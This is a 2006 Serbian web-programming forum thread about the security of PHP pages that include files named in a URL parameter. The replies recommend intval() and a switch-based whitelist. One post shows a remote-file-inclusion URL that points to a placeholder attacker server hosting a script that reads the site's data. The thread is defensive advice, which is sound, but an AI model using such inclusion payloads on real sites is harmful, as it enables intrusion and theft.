Poslao: 28 Dec 2006 00:23
|
offline
- igor86
- Stručni saradnik
Web programiranje
- Pridružio: 24 Maj 2006
- Poruke: 1633
|
Interesuje me koliko je pogubno koristiti npr.
<a href="index.php?navigacija=nekibroj">
,a u php-u da vam ovaj link referise na nekibroj.php, odnosno include "nekibroj.php"; (nadam se da ste razumjeli)
Šta mislite o ovome i da li je neko imao bilo kakvih iskustava sa probijanjem sigurnosti svoje skripte.
|
|
|
Registruj se da bi učestvovao u diskusiji. Registrovanim korisnicima se NE prikazuju reklame unutar poruka.
|
|
Poslao: 28 Dec 2006 06:39
|
offline
- Peca
- Glavni Administrator
- Predrag Damnjanović
- SysAdmin i programer
- Pridružio: 17 Apr 2003
- Poruke: 23211
- Gde živiš: Niš
|
pre include() OBAVEZNO uradi
$nekibroj=intval($nekibroj);
i neki if (fileexist(...
|
|
|
|
Poslao: 28 Dec 2006 12:42
|
offline
- igor86
- Stručni saradnik
Web programiranje
- Pridružio: 24 Maj 2006
- Poruke: 1633
|
Ok, znači što se tiče sigurnosti ovo je uredu. Pravim neki veći projekat, pa da u samom startu ne zeznem.
|
|
|
|
Poslao: 28 Dec 2006 14:51
|
offline
- Blood
- Ugledni građanin
- Pridružio: 26 Jul 2003
- Poruke: 384
- Gde živiš: Beograd
|
nije to u redu sto se tice sigurnosti, sta ako neko napise:
index.php?navigacija=http://putanja_do_njegovog_servera/fajl_koji_cita_sve_podatke_sa_tvog_servera.php
sta ces onda??
|
|
|
|
Poslao: 28 Dec 2006 15:11
|
offline
- igor86
- Stručni saradnik
Web programiranje
- Pridružio: 24 Maj 2006
- Poruke: 1633
|
O tome slucaju bi otvorio default page-naslovnu. Koliko se uistinu povećava sigurnost upotrebom .htaccess-a?
|
|
|
|
Poslao: 28 Dec 2006 16:17
|
offline
- Stenley
- Zaslužni građanin
- Pridružio: 01 Mar 2005
- Poruke: 549
- Gde živiš: Apatin
|
$stranica = $_GET["stranica"];
switch ( $stranica ) {
case "" :
case "pocetna":
include("putanja/pocetna.php");
break;
case "test":
include("putanja/test.php");
break;
default :
include("putanja/pocetna.php");
break;
}
<a href="index.php?stranica=pocetna">Početna</a>
<a href="index.php?stranica=test">Test</a>
Po meni je najsigurnije ovako...nema laži nema prevare
Ukoliko neko ukuca neku drugu putanju otvorice default ili u ovome slučaju "putanja/pocetna.php"
|
|
|
|
Poslao: 28 Dec 2006 17:10
|
offline
- Peca
- Glavni Administrator
- Predrag Damnjanović
- SysAdmin i programer
- Pridružio: 17 Apr 2003
- Poruke: 23211
- Gde živiš: Niš
|
Blood ::nije to u redu sto se tice sigurnosti, sta ako neko napise:
index.php?navigacija=http://putanja_do_njegovog_servera/fajl_koji_cita_sve_podatke_sa_tvog_servera.php
sta ces onda??
zato sam rekao da obavezno uradi intval(), pa moze da se kuca do mile volje tekst, intval() ce ga pretvoriti u 0.
inace, losa zamisao Igore, ovo sto je Stenley predlozio je bolja, i standardna, varijanta.
|
|
|
|